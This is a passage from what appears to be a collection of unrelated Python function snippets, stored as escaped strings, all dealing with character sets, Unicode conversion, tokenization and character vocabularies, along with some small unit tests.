r\"Ik ben ge\\u00EFnteresseerd in de co\\u00F6rdinatie van mijn knie\\u00EBn, maar kan niet \\u00E9\\u00E9n \\u00E0 twee enqu\\u00EAtes vinden die recht doet aan mijn carri\\u00E8re op Cura\\u00E7ao\")\n output = input.split(\" \")\n output[8] = output[8][0:-1]\n for (itmO, itmV) in zip(output, tokenize_en(input)):\n self.assertEqual(itmO, itmV[0])\n self.assertTrue(input[itmV[1]:].startswith(itmO))", "def __init__(self):\n self.charset = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'\n self.mapping = [ch for ch in self.charset]\n shuffle(self.mapping)\n super().__init__(self.mapping)", "def ring_characters(self):\n return self._charset", "def __init__(self):\n self.chars = {}\n self.end_of_word = '#'", "def gen_chars(self, lines_str_list):\n char_index_counter = 0\n chars = VGroup()\n for line_no in range(lines_str_list.__len__()):\n chars.add(VGroup())\n chars[line_no].add(\n *self.lines_text.chars[\n char_index_counter : char_index_counter\n + lines_str_list[line_no].__len__()\n + 1\n ]\n )\n char_index_counter += lines_str_list[line_no].__len__() + 1\n return chars", "def _create_unicode_map():\n unicode_map = {}\n\n for beta, uni in _map.BETACODE_MAP.items():\n # Include decomposed equivalent where necessary.\n norm = unicodedata.normalize('NFC', uni)\n unicode_map[norm] = beta\n unicode_map[uni] = beta\n\n # Add the final sigmas.\n final_sigma_norm = unicodedata.normalize('NFC', _FINAL_LC_SIGMA)\n unicode_map[final_sigma_norm] = 's'\n unicode_map[_FINAL_LC_SIGMA] = 's'\n\n return unicode_map", "def char_mapping(sentences, lower):\n chars = [[x[0].lower() if lower else x[0] for x in s] for s in sentences]\n dico = create_dico(chars)\n dico[\"<PAD>\"] = 10000001\n dico['<UNK>'] = 10000000\n char_to_id, id_to_char = create_mapping(dico)\n print(\"Found %i unique words (%i in total)\" % (\n len(dico), sum(len(x) for x in chars)\n ))\n return dico, char_to_id, id_to_char", "def test_multiple_char_unique(self):\n self.assertTrue(all_unique_chars_no_set(\"ab\"))\n self.assertTrue(all_unique_chars_no_set(\"ba\"))\n self.assertTrue(all_unique_chars_no_set(\"make\"))\n self.assertTrue(all_unique_chars_no_set(\"thorn\"))\n self.assertTrue(all_unique_chars_no_set(\"malibu\"))\n self.assertTrue(all_unique_chars_no_set(string.ascii_letters))", "def preprocess_morpheme(self):\n self.char_to_id, self.unk_char_list = self.build_vocab(mode=\"char\")\n self.morpheme_to_id, self.unk_morph_list, self.max_morph_per_word = self.build_morpheme_vocab()\n for ch in self.char_to_id:\n if ch not in self.morpheme_to_id:\n self.morpheme_to_id[ch] = len(self.morpheme_to_id)\n self.subword_vocab_size = len(self.morpheme_to_id)\n with open(self.sub_vocab_file, 'wb') as f:\n pickle.dump((self.morpheme_to_id, self.unk_char_list, self.unk_morph_list, self.max_morph_per_word), f)", "def find_unicode(self, modifier=4):\n wide = []\n matches = re.finditer(b'([\\x20-\\x7e]\\x00){' +\n str(modifier).encode('ascii') + b',}', self.buff)\n\n if matches:\n for m in matches:\n wide.append(m.group(0).decode('utf-16'))\n return wide", "def decode(self, coded_set):", "def __get_utl_charset(self, url_content):\n pass", "def create_dictionary():\n chars = sorted(ch for ch in string.printable if ch not in (\"\\x0b\", \"\\x0c\", \"\\r\"))\n char2id = dict((ch, i + 1) for i, ch in enumerate(chars))\n char2id.update({\"\": 0})\n id2char = dict((char2id[ch], ch) for ch in char2id)\n vocab_size = len(char2id)\n id2char.update({98:'\\\\unk',99:'\\\\unk'})\n return char2id, id2char, vocab_size,chars", "def test_unicode_attribute(Script):\n s1 = ('#-*- coding: utf-8 -*-\\nclass Person():\\n'\n ' name = \"e\"\\n\\nPerson().name.')\n completions1 = Script(s1).complete()\n assert 'strip' in [c.name for c in completions1]\n s2 = ('#-*- coding: utf-8 -*-\\nclass Person():\\n'\n ' name = \"é\"\\n\\nPerson().name.')\n completions2 = Script(s2).complete()\n assert 'strip' in [c.name for c in completions2]", "def _get_unique_chars(self, data_string):\n unique_chars = list(set(data_string))\n return unique_chars", "def latin(minimum=3, maximum=8, separator=' '):\n \n genus = ''.join(random.sample(string.ascii_lowercase, random.randint(3, 8)))\n epithet = ''.join(random.sample(string.ascii_lowercase, random.randint(3, 8)))\n return separator.join([genus.title(), epithet])", "def _splitbycharset(txt, charset):\n for firstpos, char in enumerate(txt):\n if char in charset:\n return txt[firstpos], txt[:firstpos], txt[firstpos + 1:]\n return '', txt, ''", "def test_unicode_parenthization():\n alpha = symbols('alpha')\n printer = SympyUnicodePrinter()\n printer.parenthesize(alpha, 0) == 'α'", "def test_vars_generator_with_taken_vars(self):\n iterator = vars_generator({'a', 'b'})\n\n for char_number in range(ord('c'), ord('z') + 1):\n self.assertEqual(next(iterator), chr(char_number))\n self.assertEqual(next(iterator), 'aa')", "def label(mi_, ma_):\n\treturn \"caractères Unicode des points de code {} à {}\".format(mi_, ma_)", "def preprocess_char_ngram(self):\n self.char_to_id, self.unk_char_list = self.build_vocab(mode=\"char\")\n self.ngram_to_id, self.unk_ngram_list, self.max_ngram_per_word = self.build_ngram_vocab(self.n)\n for ch in self.char_to_id:\n if ch not in self.ngram_to_id:\n self.ngram_to_id[ch] = len(self.ngram_to_id)\n self.subword_vocab_size = len(self.ngram_to_id)\n with open(self.sub_vocab_file, 'wb') as f:\n pickle.dump((self.ngram_to_id, self.unk_char_list, self.unk_ngram_list, self.max_ngram_per_word), f)", "def _map_characters_to_subwords(self, input_ids: List[int], input_ids_for_subwords: List[int]) -> List[int]:\n character_pos_to_subword_pos = [0 for _ in input_ids]\n\n ## '[CLS]', 'a', 's', 't', 'r', 'o', 'n', 'o', 'm', 'e', 'r', 's', '_', 'd', 'i', ..., 'l', 'o', '[SEP]', 'd', 'i', 'd', 'i', 'e', 'r', '_', 's', 'a', 'u', 'm', 'o', 'n', ..., '[SEP]'\n tokens = self._tokenizer.convert_ids_to_tokens(input_ids)\n ## '[CLS]', 'astronomers', 'did', '##ie', 'so', '##mon', 'and', 'tri', '##sti', '##an', 'g', '##llo', '[SEP]', 'did', '##ier', 'sa', '##um', '##on', '[SEP]', 'astro', '##no', '##mie', '[SEP]', 'tristan', 'gui', '##llo', '##t', '[SEP]', ..., '[SEP]', 'mercy', '[SEP]']\n tokens_for_subwords = self._tokenizer.convert_ids_to_tokens(input_ids_for_subwords)\n j = 0 # index for tokens_for_subwords\n j_offset = 0 # current letter index within subword\n for i in range(len(tokens)):\n character = tokens[i]\n subword = tokens_for_subwords[j]\n if character == \"[CLS]\" and subword == \"[CLS]\":\n character_pos_to_subword_pos[i] = j\n j += 1\n continue\n if character == \"[SEP]\" and subword == \"[SEP]\":\n character_pos_to_subword_pos[i] = j\n j += 1\n continue\n if character == \"[CLS]\" or character == \"[SEP]\" or subword == \"[CLS]\" or subword == \"[SEP]\":\n raise IndexError(\n \"character[\"\n + str(i)\n + \"]=\"\n + character\n + \"; subword[\"\n + str(j)\n + \";=\"\n + subword\n + \"subwords=\"\n + str(tokens_for_subwords)\n )\n # At this point we expect that\n # subword either 1) is a normal first token of a word or 2) starts with \"##\" (not first word token)\n # character either 1) is a normal character or 2) is a space character \"_\"\n if character == \"_\":\n character_pos_to_subword_pos[i] = j - 1 # space is assigned to previous subtoken\n continue\n if j_offset < len(subword):\n if character == subword[j_offset]:\n character_pos_to_subword_pos[i] = j\n j_offset += 1\n else:\n raise IndexError(\n \"character mismatch:\"\n + \"i=\"\n + str(i)\n + \"j=\"\n + str(j)\n + \"j_offset=\"\n + str(j_offset)\n + \"; len(tokens)=\"\n + str(len(tokens))\n + \"; len(subwords)=\"\n + str(len(tokens_for_subwords))\n )\n # if subword is finished, increase j\n if j_offset >= len(subword):\n j += 1\n j_offset = 0\n if j >= len(tokens_for_subwords):\n break\n if tokens_for_subwords[j].startswith(\"##\"):\n j_offset = 2\n # check that all subword tokens are processed\n if j < len(tokens_for_subwords):\n raise IndexError(\n \"j=\"\n + str(j)\n + \"; len(tokens)=\"\n + str(len(tokens))\n + \"; len(subwords)=\"\n + str(len(tokens_for_subwords))\n )\n return character_pos_to_subword_pos", "def prepare_set(text, max_length=64):\n global tokenizer\n\n text = [ preprocess_text(t) if set_id != \"gr\" else strip_accents_and_lowercase(preprocess_text(t)) for t in text ]\n t = tokenizer.batch_encode_plus(text,\n pad_to_max_length=True,\n add_special_tokens=True,\n max_length=max_length,\n return_tensors='pt')\n\n return t[\"input_ids\"], t[\"attention_mask\"], t[\"token_type_ids\"]", "def get_vocab(shi):\n \n # 构建字与id的相互映射\n id2char = dict(enumerate(set(''.join(shi))))\n char2id = {j:i for i,j in id2char.items()}\n print(f'length {len(id2char)}')\n\n \n return id2char, char2id", "def test_given_alphabet_has_code_for_each_character():\n codes = set()\n for char in MORSE_CODE_ALPHABET:\n assert char in MORSE_CHAR_DICT\n codes.add(MORSE_CHAR_DICT[char])\n assert len(codes) == len(MORSE_CODE_ALPHABET)", "def _decode_multiple_subject(self, decoded: str) -> Set[str]:\n\n result = set()\n\n rematch = self._regex_helper.set_regex(r\"((?:[^~\\*,]+))\").match(\n decoded, rematch=True, return_match=True\n )\n\n if rematch:\n result.update({self.extract_base(x) for x in rematch})\n\n return result", "def display_characters(self):\n return f'{self.character_set}'", "def test_annotate_text_utf32_directly_index_into_unicode():\n test_string = \"a \\u00e3 \\u0201 \\U0001f636 b\"\n result = analyze.analyze_syntax(test_string, encoding=\"UTF32\")\n tokens = result[\"tokens\"]\n\n assert tokens[0][\"text\"][\"content\"] == \"a\"\n offset = tokens[0][\"text\"].get(\"beginOffset\", 0)\n assert test_string[offset] == tokens[0][\"text\"][\"content\"]\n\n assert tokens[1][\"text\"][\"content\"] == \"\\u00e3\"\n offset = tokens[1][\"text\"].get(\"beginOffset\", 0)\n assert test_string[offset] == tokens[1][\"text\"][\"content\"]\n\n assert tokens[2][\"text\"][\"content\"] == \"\\u0201\"\n offset = tokens[2][\"text\"].get(\"beginOffset\", 0)\n assert test_string[offset] == tokens[2][\"text\"][\"content\"]\n\n # Temporarily disabled\n # assert tokens[3]['text']['content'] == u'\\U0001f636'\n # offset = tokens[3]['text'].get('beginOffset', 0)\n # assert test_string[offset] == tokens[3]['text']['content']\n\n # assert tokens[4]['text']['content'] == u'b'\n # offset = tokens[4]['text'].get('beginOffset', 0)\n # assert test_string[offset] == tokens[4]['text']['content']", "def character_map(text):\n\n print(f\"Total character count: {len(text)}\\n\")\n\n characters = sorted(list(set(text))) # Get sorted list of individual characters\n n_to_char = {}\n char_to_n = {}\n\n num = 0\n for char in characters:\n n_to_char[num] = char\n char_to_n[char] = num\n num += 1\n\n return characters, n_to_char, char_to_n", "def _hidden_in_unicode(self, txt):", "def __init__(self) -> None:\n self.hebrew_alphabet = None # list of hebrew characters\n self.augmenter = Augmenter()", "def __init__(self):\n self.i, self.pool = 0, list('ABCDEFGHIJKLMNOPQRSTUVWXYZ')", "def __init__(self):\n self.iteration_deep = 0\n self.max_iteration_deep = 2\n self.max_dict_key_length = 10\n self.max_string_length = 20\n self.dict_key_characters = string.ascii_lowercase + string.ascii_uppercase + \"_\"\n self.string_value_characters = (string.ascii_lowercase + string.ascii_uppercase +\n \"_\" + string.punctuation + \" \")", "def unicode2ascii(_unicrap):\n xlate = {0xc0:'A', 0xc1:'A', 0xc2:'A', 0xc3:'A', 0xc4:'A', 0xc5:'A',\n 0xc6:'Ae', 0xc7:'C',\n 0xc8:'E', 0xc9:'E', 0xca:'E', 0xcb:'E',\n 0xcc:'I', 0xcd:'I', 0xce:'I', 0xcf:'I',\n 0xd0:'Th', 0xd1:'N',\n 0xd2:'O', 0xd3:'O', 0xd4:'O', 0xd5:'O', 0xd6:'O', 0xd8:'O',\n 0xd9:'U', 0xda:'U', 0xdb:'U', 0xdc:'U',\n 0xdd:'Y', 0xde:'th', 0xdf:'ss',\n 0xe0:'a', 0xe1:'a', 0xe2:'a', 0xe3:'a', 0xe4:'a', 0xe5:'a',\n 0xe6:'ae', 0xe7:'c',\n 0xe8:'e', 0xe9:'e', 0xea:'e', 0xeb:'e',\n 0xec:'i', 0xed:'i', 0xee:'i', 0xef:'i',\n 0xf0:'th', 0xf1:'n',\n 0xf2:'o', 0xf3:'o', 0xf4:'o', 0xf5:'o', 0xf6:'o', 0xf8:'o',\n 0xf9:'u', 0xfa:'u', 0xfb:'u', 0xfc:'u',\n 0xfd:'y', 0xfe:'th', 0xff:'y',\n 0xa1:'!', 0xa2:'{cent}', 0xa3:'{pound}', 0xa4:'{currency}',\n 0xa5:'{yen}', 0xa6:'|', 0xa7:'{section}', 0xa8:'{umlaut}',\n 0xa9:'{C}', 0xaa:'{^a}', 0xab:'<<', 0xac:'{not}',\n 0xad:'-', 0xae:'{R}', 0xaf:'_', 0xb0:'{degrees}',\n 0xb1:'{+/-}', 0xb2:'{^2}', 0xb3:'{^3}', 0xb4:\"'\",\n 0xb5:'{micro}', 0xb6:'{paragraph}', 0xb7:'*', 0xb8:'{cedilla}',\n 0xb9:'{^1}', 0xba:'{^o}', 0xbb:'>>',\n 0xbc:'{1/4}', 0xbd:'{1/2}', 0xbe:'{3/4}', 0xbf:'?',\n 0xd7:'*', 0xf7:'/'\n }\n\n s = \"\"\n for i in _unicrap:\n ordi = ord(i)\n if ordi in xlate:\n s += xlate[ordi]\n elif ordi >= 0x80:\n pass\n else:\n s += str(i)\n return s", "def __init__(self, shift):\n self.charset = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'\n self.mapping = [\n chr((k + shift) % len(self.charset) + ord(self.charset[0]))\n for k in range(len(self.charset))\n ]\n super().__init__(self.mapping)", "def unicode_cap(cap):\n return tigetstr(cap).decode('latin1')", "def characters():\n\n letter = \"a b c d e f g h i j k l m n o p q r s t u v w x y z\".split()\n sc = \"! @ # $ % ^ & * ( ) _ - + = ? : ;\".split()\n\n\n chars = []\n chars.append(random.choice(letter))\n chars.append(random.choice(letter).upper())\n chars.append(str(random.randint(0,9)))\n chars.append(random.choice(sc))\n\n return chars", "def test_multiple_char_not_unique(self):\n self.assertFalse(all_unique_chars_no_set(\"aa\"))\n self.assertFalse(all_unique_chars_no_set(\"alabama\"))\n self.assertFalse(all_unique_chars_no_set(\"Ricardio\"))\n self.assertFalse(all_unique_chars_no_set(\"aardvark\"))\n self.assertFalse(all_unique_chars_no_set(\"Zimbabwe\"))\n self.assertFalse(all_unique_chars_no_set(\"....What?....\"))", "def __init__(self, config, sqc):\n\t\tself.sqc = sqc\n\t\tself.config = config\n\t\t\n\t\tif ( self.config.useunicode ) :\n\t\t\tself.A176 = unichr(9617).encode('UTF-8')\n\t\t\tself.A177 = unichr(9618).encode('UTF-8')\n\t\t\tself.A178 = unichr(9619).encode('UTF-8')\n\t\t\tself.A219 = unichr(9608).encode('UTF-8')\n\t\t\tself.A220 = unichr(9604).encode('UTF-8')\n\t\t\tself.A221 = unichr(9612).encode('UTF-8')\n\t\t\tself.A222 = unichr(9616).encode('UTF-8')\n\t\t\tself.A223 = unichr(9600).encode('UTF-8')\n\t\t\tself.A254 = unichr(9642).encode('UTF-8')\n\t\telse:\n\t\t\tself.A176 = unichr(176).encode('latin-1')\n\t\t\tself.A177 = unichr(177).encode('latin-1')\n\t\t\tself.A178 = unichr(178).encode('latin-1')\n\t\t\tself.A219 = unichr(219).encode('latin-1')\n\t\t\tself.A220 = unichr(220).encode('latin-1')\n\t\t\tself.A221 = unichr(221).encode('latin-1')\n\t\t\tself.A222 = unichr(222).encode('latin-1')\n\t\t\tself.A223 = unichr(223).encode('latin-1')\n\t\t\tself.A254 = unichr(254).encode('latin-1')\n\n\t\tself.ESC = \"\\x1b[\"", "def load_zero_widths() -> \"list[bool]\":\n with fetch_open(\"UnicodeData.txt\") as categories:\n zw_map = []\n current = 0\n for line in categories.readlines():\n if len(raw_data := line.split(\";\")) != 15:\n continue\n [codepoint, name, cat_code] = [\n int(raw_data[0], 16),\n raw_data[1],\n raw_data[2],\n ]\n zero_width = cat_code in [\"Cc\", \"Cf\", \"Mn\", \"Me\"]\n\n assert current <= codepoint\n while current <= codepoint:\n if name.endswith(\", Last>\") or current == codepoint:\n # if name ends with Last, we backfill the width value to all codepoints since\n # the previous codepoint (aka the start of the range)\n zw_map.append(zero_width)\n else:\n # unassigned characters are implicitly given Neutral width, which is nonzero\n zw_map.append(False)\n current += 1\n\n while len(zw_map) < NUM_CODEPOINTS:\n # Catch any leftover codepoints. They must be unassigned (so nonzero width)\n zw_map.append(False)\n\n return zw_map", "def gen_char_list(readpath, savepath, font_data):\n # txt内の文字をカウントしていく\n filelist = os.listdir(readpath)\n chardict = {}\n for filepath in filelist:\n file = open(readpath + filepath)\n for line in file:\n for char in line.replace('\\n', ''):\n if char in chardict:\n chardict[char] += 1\n else:\n chardict[char] = 1\n\n # カウント数でソートして多い順にラベル化\n # TODO if frequency is same, sorted by number of shift-jis code\n char_list = []\n for key, value in sorted(chardict.items(), key=lambda x: x[1]):\n char_list.append([key, font_data.width(key), value])\n char_list.reverse()\n\n for key, item in enumerate(char_list): # TODO remove if bag fixed\n if item[1]==0:\n char_list[key][1] = 16\n\n for item in char_list:\n print(item)\n # 保存\n with open(savepath, 'wb') as f: # TODO CSV形式化\n pickle.dump(char_list, f)\n\n print('saved ', savepath, ' number of character is ', len(char_list))", "def init_dict() -> None:\n for elem in letters:\n ascii_dict[elem] = []\n for elem in numbers:\n ascii_dict[elem] = []\n for elem in symbols:\n ascii_dict[elem] = []", "def __init__(self):\n self.digits = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'\n self.digpos = {}\n for pos, dig in enumerate(self.digits):\n self.digpos[dig] = pos", "def report_charset(self):\n print fmt(\"[charset]\", MAGENTA)\n print fmt(sorted([x for x in self.charset]), WHITE)\n print\n print fmt(\"[ignores]\", MAGENTA)\n print fmt(sorted([x for x in self.ignores]), WHITE)", "def read_chars(self):\n char_data = []\n for word in self.train_data:\n if word == self.eos or word == self.sos:\n continue\n if self.unit == \"oracle\":\n if '+' in word:\n tags = word.split('+')\n word_tag = tags[0].split(':')\n word = word_tag[1]\n if self.unit == \"morpheme\":\n word = re.sub(\"@@\", \"\", word)\n char_data.extend([ch for ch in word])\n return char_data", "def fill_charset(self, data):\n self.charset = get_optional_value(data, self.CHARSET, \"utf8mb4\")\n self.charset = self.charset or \"utf8mb4\"", "def __init__(self):\n self.vowels = u'あいうえお'\n self.consonants = u'かがさざただまはばぱなら'\n self.voiced_consonants = set(u'がだざびぴじばぱ')\n self._table = {\n u'あ': u'あいうえお',\n u'か': u'かきくけこ',\n u'が': u'がぎぐげご',\n u'さ': u'さしすせそ',\n u'ざ': u'ざじずぜぞ',\n u'た': u'たちつてと',\n u'だ': u'だぢづでど',\n u'ま': u'まみむめも',\n u'は': u'はひふへほ',\n u'ば': u'ばびぶべぼ',\n u'ぱ': u'ぱぴぷぺぽ',\n u'な': u'なにぬねの',\n u'ら': u'らりるれろ'\n }\n\n to_consonant_line = {}\n for c_line, elems in self._table.iteritems():\n to_consonant_line.update([(e, c_line) for e in elems])\n self._to_consonant_line = to_consonant_line\n\n to_vowel_line = {}\n for vowel_line in apply(zip, self._table.values()):\n vowel_line = list(sorted(vowel_line))\n vowel = vowel_line[0]\n to_vowel_line.update([(k, vowel) for k in vowel_line])\n self._to_vowel_line = to_vowel_line\n return", "def loadChars(file=os.path.join(os.path.dirname(__file__), \"character_set.txt\")):\r\n\r\n with open(file,\"r\") as f:\r\n return json.load(f)", "def test_opt_charsetWithRemainder(self):\n line = b\"CHARSET UTF-8 remainder\"\n identifier, remainder = self.server.opt_charset(line)\n self.assertEqual(identifier, b\"UTF-8\")\n self.assertEqual(remainder, b\"remainder\")", "def structure_data(characters):\n # Ignore superfluous diachritics and optional symbol\n IGNORE = [\"ˈ\", \"ˌ\", \"'\", \"̪\", \"̞\", \"ˣ\", \"̯\", \"-\", \"(\", \")\", \"[\", \"]\"]\n out = []\n for i, c in enumerate(characters):\n if c in IGNORE:\n continue\n # \"ː\" should be part of the character (no space between), also account for variation\n # in vowel length character used\n elif c == \"ː\" or c == \":\":\n out[-1] += \"ː\"\n # Do not add the optional characters, either (In Finnish seems to just be a glottal stop)\n elif i > 0 and characters[i-1] == \"(\" and characters[i + 1] == \")\":\n continue\n else:\n out.append(c)\n\n return ' '.join(out)", "def test_decode():\n assert TextCleaner().transform([[\"tést\"]])[\"corpus\"][0] == \"test\"", "def characters(self, data):\n pass", "def test_single_char(self):\n self.assertTrue(all_unique_chars_no_set(\"a\"))\n self.assertTrue(all_unique_chars_no_set(\"b\"))", "def test_bug2785373(self):\n input = \"So, one dey when I wes 17, I left.\"\n for _ in tokenize_en(input):\n pass\n input = raw_unicode(\"So, one dey when I wes 17, I left.\")\n for _ in tokenize_en(input):\n pass", "def enlabel(mi_, ma_):\n\treturn \"Unicode characters from {} to {} codepoints\".format(mi_, ma_)", "def prepare(self):\n\n for i in range(len(self.__corpora)):\n string = self.__corpora[i]\n string = sub(r'[\\n\\t]| {2,}', ' ', string.lower())\n string = sub(r'[^{0}]'.format(self.alphabet + ' '), '', string)\n\n if self.lang == 'uk':\n string = sub(r'[ґ]', 'г', string)\n\n elif self.lang == 'ru':\n string = sub(r'[ё]', 'е', string)\n\n self.__corpora[i] = string", "def test_encoding(self):\n\n for name in TEST_NAMES:\n self.colorspace.setEncoding(name)\n self.assertEqual(name, self.colorspace.getEncoding())", "def char_encoding(self, data):\n _buffer = list()\n for word in data:\n chars = self.word_to_chars(word)\n _buffer.append(self.padding(chars, self.max_word_len, self.char_to_id[\"<PAD>\"]))\n return _buffer", "def initial_finder(self, seq, ins):\n# print('call initial_finder, input = '+seq)\n letter=seq[0]\n if letter in ins:\n if letter in ['д','т','ц','с']:\n next_letter=seq[:2]\n if next_letter in ins:\n initial=next_letter\n len_init=2\n else:\n initial=letter\n len_init=1\n else:\n initial=letter\n len_init=1 \n else:\n initial='_'\n len_init=0\n# print(initial)\n return initial, len_init", "def get_map(self, chars):\n\n byte_offset = 0\n cb_map = {}\n\n for char_offset, char in enumerate(chars):\n cb_map[char_offset] = byte_offset\n byte_offset += len(char.encode('utf-8'))\n return cb_map", "def _init_dataset(self):\n chars = set()\n with open(self.file_path + \"/words.txt\", 'r') as input_file:\n for line in input_file:\n line_split = line.strip().split('\\t')\n file_name = self.file_path+\"/words/\"+line_split[1]\n gt_text = line_split[0]\n chars = chars.union(set(list(gt_text)))\n self.samples.append((file_name, gt_text))\n input_file.close()\n\n self.char_set = sorted(list(chars))", "def setUnicodeValue(glyph, glyphList):\n\n if glyph.name in glyphList:\n glyph.unicode = int(glyphList[glyph.name], 16)\n else:\n uvNameMatch = re.match(\"uni([\\dA-F]{4})$\", glyph.name)\n if uvNameMatch:\n glyph.unicode = int(uvNameMatch.group(1), 16)", "def _create_superscript_mapping():\n # 2 & 3 have different unicode superscript translations, so\n # we need to manually create different cases for them.\n # Also, 1 needs to be manually added with a different case.\n two_and_three = [2, 3]\n all_other_normal_nums = [0, *[i for i in range(4, 10)]]\n\n # Create the unicode superscripts for each of them.\n unicode_superscripts = [\n chr(0x2070 + i) for i in all_other_normal_nums]\n unicode_superscripts.extend(\n [chr(0x00B0 + i) for i in two_and_three])\n unicode_superscripts.append(chr(0x00B9))\n\n # Sort the list.\n normal, unicode = zip(*sorted(zip(\n [*all_other_normal_nums, *two_and_three, 1],\n unicode_superscripts)))\n\n # Convert the normal digits to strings.\n normal = [str(i) for i in normal]\n\n # Create a dict mapping the two.\n return DefaultDictionary(zip(normal, unicode))", "def _create_conversion_trie(strict):\n t = pygtrie.CharTrie()\n\n for beta, uni in _map.BETACODE_MAP.items():\n if strict:\n t[beta] = uni\n else:\n # The order of accents is very strict and weak. Allow for many orders of\n # accents between asterisk and letter or after letter. This does not\n # introduce ambiguity since each betacode token only has one letter and\n # either starts with a asterisk or a letter.\n diacritics = beta[1:]\n\n perms = itertools.permutations(diacritics)\n for perm in perms:\n perm_str = beta[0] + ''.join(perm)\n t[perm_str.lower()] = uni\n t[perm_str.upper()] = uni\n\n return t", "def test_issue3625():\n nlp = Hindi()\n doc = nlp(u\"hi. how हुए. होटल, होटल\")\n assert [token.text for token in doc] == ['hi', '.', 'how', 'हुए', '.', 'होटल', ',', 'होटल']", "def preprocess_sub_units(self):\n if self.unit == \"char\":\n self.preprocess_char()\n elif self.unit == \"char-ngram\":\n self.preprocess_char_ngram()\n elif self.unit == \"morpheme\":\n self.preprocess_morpheme()\n elif self.unit == \"oracle\":\n self.preprocess_oracle()\n else:\n sys.exit(\"Unknown unit\")", "def availchars(charactertype):\n\n # If the lowercase version of the character type is 'letters'\n if charactertype.lower() == 'letters':\n # Return the result\n return string.ascii_letters\n\n # If the lowercase version of the character type is 'lowercase'\n elif charactertype.lower() == 'lowercase':\n # Return the result\n return string.ascii_lowercase\n\n # If the lowercase version of the character type is 'uppercase'\n elif charactertype.lower() == 'uppercase':\n # Return the result\n return string.ascii_uppercase\n\n # If the lowercase version of the character type is 'digits'\n elif charactertype.lower() == 'digits':\n # Return the result\n return string.digits\n\n # If the lowercase version of the character type is 'hexdigits'\n elif charactertype.lower() == 'hexdigits':\n # Return the result\n return string.hexdigits\n\n # If the lowercase version of the character type is 'punctuation'\n elif charactertype.lower() == 'punctuation':\n # Return the result\n return string.punctuation\n\n # If the lowercase version of the character type is 'printable'\n elif charactertype.lower() == 'printable':\n # Return the result\n return string.printable\n\n # If the lowercase version of the character type is 'whitespace'\n elif charactertype.lower() == 'whitespace':\n # Return the result\n return string.whitespace\n\n # If the lowercase version of the character type is 'all'\n elif charactertype.lower() == 'all':\n # Return the result\n return string.ascii_letters + string.ascii_lowercase + string.ascii_uppercase + string.digits + string.hexdigits + string.punctuation + string.printable + string.whitespace\n\n # Raise a warning\n raise ValueError(\"Invalid character type provided.\")", "def create_character() -> list:\n return [0, 0]", "def buildTrainingSet(voc, bychar=True, maxlen=20, step=3):\n \n text, sym_indices, _ = voc\n sentences = []\n next_syms = []\n \n syms = set(text) # unique symbols (chars or words)\n \n for i in range(0, len(text) - maxlen, step):\n sentences.append(text[i: i + maxlen])\n next_syms.append(text[i + maxlen])\n print('nb sequences:', len(sentences))\n \n print('Vectorization...')\n X = np.zeros((len(sentences), maxlen, len(syms)), dtype=np.bool)\n y = np.zeros((len(sentences), len(syms)), dtype=np.bool)\n for i, sentence in enumerate(sentences):\n for t, sym in enumerate(sentence):\n X[i, t, sym_indices[sym]] = 1\n y[i, sym_indices[next_syms[i]]] = 1\n\n return (X,y)", "def latin1_to_ascii(self, unicrap):\n xlate = {0xc0: 'A', 0xc1: 'A', 0xc2: 'A', 0xc3: 'A', 0xc4: 'A', 0xc5: 'A',\n 0xc6: 'Ae', 0xc7: 'C',\n 0xc8: 'E', 0xc9: 'E', 0xca: 'E', 0xcb: 'E',\n 0xcc: 'I', 0xcd: 'I', 0xce: 'I', 0xcf: 'I',\n 0xd0: 'Th', 0xd1: 'N',\n 0xd2: 'O', 0xd3: 'O', 0xd4: 'O', 0xd5: 'O', 0xd6: 'O', 0xd8: 'O',\n 0xd9: 'U', 0xda: 'U', 0xdb: 'U', 0xdc: 'U',\n 0xdd: 'Y', 0xde: 'th', 0xdf: 'ss',\n 0xe0: 'a', 0xe1: 'a', 0xe2: 'a', 0xe3: 'a', 0xe4: 'a', 0xe5: 'a',\n 0xe6: 'ae', 0xe7: 'c',\n 0xe8: 'e', 0xe9: 'e', 0xea: 'e', 0xeb: 'e',\n 0xec: 'i', 0xed: 'i', 0xee: 'i', 0xef: 'i',\n 0xf0: 'th', 0xf1: 'n',\n 0xf2: 'o', 0xf3: 'o', 0xf4: 'o', 0xf5: 'o', 0xf6: 'o', 0xf8: 'o',\n 0xf9: 'u', 0xfa: 'u', 0xfb: 'u', 0xfc: 'u',\n 0xfd: 'y', 0xfe: 'th', 0xff: 'y',\n 0xa1: '!', 0xa2: '{cent}', 0xa3: '{pound}', 0xa4: '{currency}',\n 0xa5: '{yen}', 0xa6: '|', 0xa7: '{section}', 0xa8: '{umlaut}',\n 0xa9: '{C}', 0xaa: '{^a}', 0xab: '<<', 0xac: '{not}',\n 0xad: '-', 0xae: '{R}', 0xaf: '_', 0xb0: '{degrees}',\n 0xb1: '{+/-}', 0xb2: '{^2}', 0xb3: '{^3}', 0xb4: \"'\",\n 0xb5: '{micro}', 0xb6: '{paragraph}', 0xb7: '*', 0xb8: '{cedilla}',\n 0xb9: '{^1}', 0xba: '{^o}', 0xbb: '>>',\n 0xbc: '{1/4}', 0xbd: '{1/2}', 0xbe: '{3/4}', 0xbf: '?',\n 0xd7: '*', 0xf7: '/'\n }\n\n r = ''\n for i in unicrap:\n if xlate.has_key(ord(i)):\n r += xlate[ord(i)]\n elif ord(i) >= 0x80:\n pass\n else:\n r += str(i)\n return r", "def __init__(self, from_word, to_word, ws):\n (self._from_word, self._to_word, self._word_set) = (from_word,\n to_word, ws)\n # set of characters to use for 1-character changes\n self._chars = \"abcdefghijklmnopqrstuvwxyz\"", "def supercombiner(bot, ev):\n # ported from jenni\n s = 'u'\n for i in iter(range(1, 3000)):\n if unicodedata.category(chr(i)) == \"Mn\":\n s += chr(i)\n if len(s) > 100:\n break\n bot.say(s)", "def __init__(self, from_word, to_word, ws):\n (self._from_word, self._to_word, self._word_set) = (from_word,\n to_word, ws)\n # set of characters to use for 1-character changes\n self._chars = \"abcdefghijklmnopqrstuvwxyz\"\n\n # implement __eq__ and __str__\n # __repr__ is up to you", "def decode(s):\n start = 0\n multiplier = 1\n for char in s[::-1]:\n start += multiplier * LETTERS.index(char)\n multiplier = multiplier * 58\n return start", "def test_multiple_char_unique(self):\n self.assertTrue(all_unique_chars(\"ab\"))\n self.assertTrue(all_unique_chars(\"ba\"))\n self.assertTrue(all_unique_chars(\"make\"))\n 